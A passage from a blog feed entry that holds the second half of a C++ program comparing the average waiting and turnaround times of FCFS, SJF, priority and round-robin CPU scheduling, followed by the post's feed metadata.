&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;W2[0]=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=1;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;W2[i]=W2[i-1]+B2[i-1];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;TAT2[i]=W2[i]+B2[i];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;SWT2=SWT2+W2[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;STT2=STT2+TAT2[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;AWT2=(float)SWT2/3;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;ATT2=(float)STT2/3;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;//priority&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;int W3[4],TAT3[4],SWT3=0,STT3=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;float AWT3=0.0,ATT3=0.0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(j=0;j&amp;lt;3;j++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;2-j;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if(PR3[i]&amp;gt;PR3[i+1])&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{temp=PR3[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;PR3[i]=PR3[i+1];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;PR3[i+1]=temp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;temp=B3[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B3[i]=B3[i+1];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B3[i+1]=temp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;W3[0]=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=1;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;W3[i]=W3[i-1]+B3[i-1];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;TAT3[i]=W3[i]+B3[i];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;SWT3=SWT3+W3[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;STT3=STT3+TAT3[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;AWT3=(float)SWT3/3;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;ATT3=(float)STT3/3;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;//round&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;int st[10],wt[10], tat[10];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;int&amp;nbsp; count=0, swt=0, stat=0, sq=0,n=3;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;float AWT4=0.0, ATT4=0.0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;st[i]=B4[i];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;while(1)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0, count=0;i&amp;lt;n;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;temp=tq;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if(st[i]==0)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;count++;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;continue;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if(st[i]&amp;gt;tq)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;st[i]=st[i]-tq;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;else&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if (st[i]&amp;gt;=0)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;temp=st[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;st[i]=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;sq=sq+temp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;tat[i]=sq;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if(n==count)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;break;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;n;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;wt[i]=tat[i]-B4[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;swt=swt+wt[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;stat=stat+tat[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;AWT4=(float)swt/n;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;ATT4=(float)stat/n;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;//calculation&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;FCFS- Average waiting time is &quot;&amp;lt;&amp;lt;AWT1&amp;lt;&amp;lt;&quot; and Average turn around time is &quot;&amp;lt;&amp;lt;ATT1&amp;lt;&amp;lt;&quot;\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;SJF- Average waiting time is &quot;&amp;lt;&amp;lt;AWT2&amp;lt;&amp;lt;&quot; and Average turn around time is &quot;&amp;lt;&amp;lt;ATT2&amp;lt;&amp;lt;&quot;\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;PRIORITY- Average waiting time is &quot;&amp;lt;&amp;lt;AWT3&amp;lt;&amp;lt;&quot; and Average turn around time is &quot;&amp;lt;&amp;lt;ATT3&amp;lt;&amp;lt;&quot;\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;ROUND ROBIN- Average waiting time is &quot;&amp;lt;&amp;lt;AWT4&amp;lt;&amp;lt;&quot; and Average turn around time is &quot;&amp;lt;&amp;lt;ATT4&amp;lt;&amp;lt;&quot;\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if(AWT1&amp;lt;AWT2 &amp;amp;&amp;amp; AWT1&amp;lt;AWT3 &amp;amp;&amp;amp; AWT1&amp;lt;AWT4)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;FCFS Scheduling has least average waiting time and turn around time\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Average Waiting time= &quot;&amp;lt;&amp;lt;AWT1&amp;lt;&amp;lt;&quot; and Average Turn Around time= &quot;&amp;lt;&amp;lt;ATT1;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;else if(AWT2&amp;lt;AWT1 &amp;amp;&amp;amp; AWT2&amp;lt;AWT3 &amp;amp;&amp;amp; AWT2&amp;lt;AWT4)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;SJF Scheduling has least average waiting time and turn around time\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Average Waiting time= &quot;&amp;lt;&amp;lt;AWT2&amp;lt;&amp;lt;&quot; and Average Turn Around time= &quot;&amp;lt;&amp;lt;ATT2;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;else if(AWT3&amp;lt;AWT1 &amp;amp;&amp;amp; AWT3&amp;lt;AWT2 &amp;amp;&amp;amp; AWT3&amp;lt;AWT4)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Priority Scheduling has least average waiting time and turn around time\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Average Waiting time= &quot;&amp;lt;&amp;lt;AWT3&amp;lt;&amp;lt;&quot; and Average Turn Around time= &quot;&amp;lt;&amp;lt;ATT3;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;else&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Round Robin Scheduling has least average waiting time and turn around time\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Average Waiting time= &quot;&amp;lt;&amp;lt;AWT4&amp;lt;&amp;lt;&quot; and Average Turn Around time= &quot;&amp;lt;&amp;lt;ATT4;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;getch();&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: large;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;Any doubt?? Drop a comment!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/8481852147945899289/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/program-for-comparison-between-various.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/8481852147945899289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/8481852147945899289'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/program-for-comparison-between-various.html' title='Program for Comparison between various CPU Scheduling Algorithms'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 